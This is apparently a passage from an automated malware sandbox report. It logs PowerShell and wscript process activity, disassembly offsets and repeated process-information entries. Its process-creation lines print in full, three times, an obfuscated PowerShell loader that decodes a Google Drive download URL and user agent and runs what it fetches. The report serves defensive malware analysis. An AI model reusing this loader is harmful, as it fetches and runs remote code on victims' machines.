CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLed
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLedJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Allentown = 1;$Ordknappestes='Substrin';$Ordknappestes+='g';Function Preinterceded($Veinwise){$Regnorms=$Veinwise.Length-$Allentown;For($Jargonium=5; $Jargonium -lt $Regnorms; $Jargonium+=(6)){$Woodener+=$Veinwise.$Ordknappestes.Invoke($Jargonium, $Allentown);}$Woodener;}function Infatuatedly($Beneficeforestillingernes191){. ($subcutaneous) ($Beneficeforestillingernes191);}$Indknebnes=Preinterceded 'HyperM Trveo givez StraiVejr.lOvervl CyanaGarde/ Myto5b.lli.Skved0Musik Appro(AcerrW,argaiThoseneskadd.lyveoUn,epwMahogsForsm MidtoNUnpu.TAllus Rveja1Share0Tales.Ove,f0Sp yd;Packw Has.WUprodiDecimnSemis6Upda.4Vaude;.saru J mcrxTwinn6 Hi c4 ph l;,assa FiberAlabavOpfin:Optag1 Tele2Under1Hlqnu. Ant.0Uni c) Sner ,rwinG.lapseMonercWightk Trano Unhe/Clime2Bibri0Westm1Folke0Taabe0Indsk1 Phle0Derhj1Svrme UdligFTimeli Philr Sa.deBla,sfJuvaloVar gx S,oe/Uegen1Syda.2Thurl1Under.Tra.y0 Slet ';$Sevenbommens=Preinterceded 'indtrU.ecansreilae DiplrRaphi-DeltaAB,ckbgSkak e ,ikrnCodswtIncom ';$Socionoms=Preinterceded 'dativhSole tBlaa.t.otlypU ions Pr i:Trima/Uninf/PeltidBiscarSolsii,ecapvBankaeCalpa.,ortagAktieoForkaoS.detgRepublUdenreFor l.Unac,cMash oBygnimByr e/Rud,sule escUng.r?Syncre Ko sxSids.p.rempoInputr L,lit Isop= SansdEnsidoMindewFilipn Ob.llKlyngoEddika,renddDoven&NaturiK,rofdTro t= Samf1 UnpaYCollieThebae Ph njPref.v LiteOT.grygVandrcCoequ5 NasiTTiresNAnskuFComplf MarmdI,jur9erind1 Allo7.ladd6 EjerEMisseDWater_Taa,t0DyspeKBlazysRapnd8FoderYCoteh3ChaufySynthn NediRDatakMKommeW Te n ';$Anskaffelsessummerne=Preinterceded 'Rumne>Chann ';$subcutaneous=Preinterceded 'RouteiFor,beLysstx.akey ';$Mesopodiale='Krnikens';Infatuatedly (Preinterceded 'Her.uS,ndebeStatutSt ej-geoaeCH.lakoL.llenTenodtReakte Apo,nSummetEr mi Adhsi-HomelPSkyggaSimontB,bonh lles formaTO duc:.ream\StigmDChagorDormiyStyrtaScrufsDi.re. J,lltS.warx ngsetinds, Su.p-F ekvVAscogaultralSkoleuDag,oe,nsgn Vandh$EtherME tadeYeomasTrilloSrettpChiliomora dUptubiByt ea.virkl.uinye Tros; Fin, ');Infatuatedly (Preinterceded ' Ae iigyrinfRadze Bjden(PrevotUnreneT.ggespatibtFratr-Necrop EvenaRo.entKabyshOm.in Bo.tgTSuper:Fa,ri\ richD Trior,rdskyBolsmaPes,isArchi.RedbrtDefekxStryctSkn,e) nte{ CosteDoradx,oopri I,rat Farl}Co.se;Diakr ');$Knscelle = Preinterceded '.nvesePragtcSnknihProvioAnker Vnin%Sor,eaHovedpC,untpCountdSkopua AniktSamgiaCuck %leaka\Man,mMS peryEstrexHumblopostcgCardia espasUnde,t ForseS iklrPhon .,ngseOKindepCe.trvFolke Hypot&Pseud&Misco Fo,tyeColoucVigtihGstevo Spor alm$Udg.a ';Infatuatedly (Preinterceded 'G.lli$ NavlgYderllGalvaoCaptibomsteaCoryzlEvigt: sansB DiakoStilllProletSkovfa SkrinRise,tllebr=Dis b( Tor,c AtmomManifdGents Formi/.adjacSak.n Saf,$Stat.KFrondnIssensEnl rcSte,ie DronlBe kelAntikeN dkm)In,al ');Infatuatedly (Preinterceded 'Slide$CentrgTraktlN,ncooK,ssabCovenaFork,lSpyds: FretAUn,lefAktiot.mbyga orval.evrdeSaftekKlokkaqu drlDobb.eLedJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FF8490171C8 push esp; retf 2_2_00007FF8490171C9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_077508C2 push eax; mov dword ptr [esp], ecx5_2_07750AC4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_09123112 push eax; retf 5_2_09123122
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0911F522 push ecx; retf 5_2_0911F5EE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_09120126 push cs; retf 5_2_0912017A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0911DD5B push ecx; retf 5_2_0911DD86
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0911DD45 push eax; ret 5_2_0911DD46
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0912199C push ebp; retf 5_2_09121A0E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_091221A3 push ds; iretd 5_2_091221A4
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0911E5A3 push ebx; retf 5_2_0911E5BA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0911D9AC push ebx; retf 5_2_0911DABA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0911D9AC push FFFFFFD6h; retf 5_2_0911DAC6
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_091231C3 push ds; retf 5_2_091231C9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_091239C4 push 00000069h; retf 5_2_091239C6
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_091205EC push ecx; retf 5_2_091205F2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0911D004 push ebp; ret 5_2_0911D00C
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0911CC3E push ebx; ret 5_2_0911CC4E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0911D84A push 00000001h; iretd 5_2_0911D852
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_09124476 push ebx; ret 5_2_0912448A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_09123C82 push ebx; ret 5_2_09123C8A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_09122084 push eax; ret 5_2_091220EE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0911FC8A push ds; retf 5_2_0911FCAA
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_091220B2 push eax; ret 5_2_091220EE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_091234BA push ebp; iretd 5_2_091234C2
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_091240DF push A6FE4245h; ret 5_2_091240E9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_0911ECF6 push edx; retf 5_2_0911ECFE
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_09120F03 push ebx; retf 5_2_09120F0A
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_09124B03 push edx; ret 5_2_09124B06
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_09122F06 push ecx; retf 5_2_09122F7E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_09122F5C push ecx; retf 5_2_09122F7E
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_09122349 push edi; retf 5_2_0912234A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
